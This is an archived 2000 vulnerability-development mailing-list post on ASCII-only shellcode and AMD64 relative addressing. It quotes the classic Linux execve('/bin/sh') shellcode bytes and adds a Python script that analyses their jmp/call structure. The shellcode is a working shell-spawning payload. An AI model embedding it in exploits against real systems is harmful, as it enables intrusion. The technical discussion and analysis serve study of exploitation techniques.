Vulnerability Development mailing list archives
Re: AMD Sledgehammer and ascii-only shellcode
From: Holger van Koll <holger () VANKOLL DE>
Date: Wed, 16 Aug 2000 04:33:40 +0200
Holger van Koll wrote:

> Hi, the new AMD cpu has the feature to access data relative to the instruction pointer.
> ...
> AFAIK it's still considered impossible to code shellcode using only ASCII data, as commands like jmp and call are not within this range.
Let me add something: in the "standard shellcode"

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

you won't have to eliminate the jmp (first command, 0xeb 0x1f) and call (0xe8 0xdc 0xff 0xff 0xff) commands, as they are not necessary anymore. They are only used to get the location of the string "/bin/sh" onto the stack, and as you know how many bytes your code takes, you also know the location relative to the instruction pointer.
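Added analysis example (not part of the original post): a small Python check that decodes the jmp/call pair in the shellcode quoted above, confirming that the short jmp lands on the call, that the call's return address is exactly the "/bin/sh" string, and which bytes fall outside printable ASCII (the jmp and call opcodes among them). The function names are my own.

```python
# Decode the jmp-short / call-rel32 "get the string address" pair in the
# classic i386 shellcode quoted in the message above (constructed copy below).
import struct

SHELLCODE = (b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
             b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
             b"\x80\xe8\xdc\xff\xff\xff/bin/sh")


def find_getpc_pair(code):
    """Return (jmp_off, call_off, string_off) for a jmp-short (0xEB) whose
    target is a call-rel32 (0xE8) that jumps back between the two, i.e. the
    pattern used to push the address of trailing data. None if absent."""
    for i in range(len(code) - 1):
        if code[i] != 0xEB:
            continue
        # jmp rel8: target = next instruction + signed 8-bit displacement
        jmp_target = i + 2 + struct.unpack("<b", code[i + 1:i + 2])[0]
        if not 0 <= jmp_target <= len(code) - 5 or code[jmp_target] != 0xE8:
            continue
        # call rel32: target = next instruction + signed 32-bit displacement
        rel = struct.unpack("<i", code[jmp_target + 1:jmp_target + 5])[0]
        call_target = jmp_target + 5 + rel
        if i < call_target < jmp_target:
            # the call pushes the address of whatever follows it
            return i, jmp_target, jmp_target + 5
    return None


def non_printable_offsets(code):
    """Offsets of bytes outside the printable ASCII range 0x20..0x7E."""
    return [i for i, b in enumerate(code) if not 0x20 <= b <= 0x7E]


if __name__ == "__main__":
    pair = find_getpc_pair(SHELLCODE)
    print("jmp/call pair:", pair)                   # (0, 33, 38)
    print("string:", SHELLCODE[pair[2]:])           # b'/bin/sh'
    print("non-printable offsets:", non_printable_offsets(SHELLCODE))
```

The call's displacement (-36) lands on the `pop esi` at offset 2, so the pushed return address, offset 38, is the string; with RIP-relative addressing that offset is simply a constant known at assembly time.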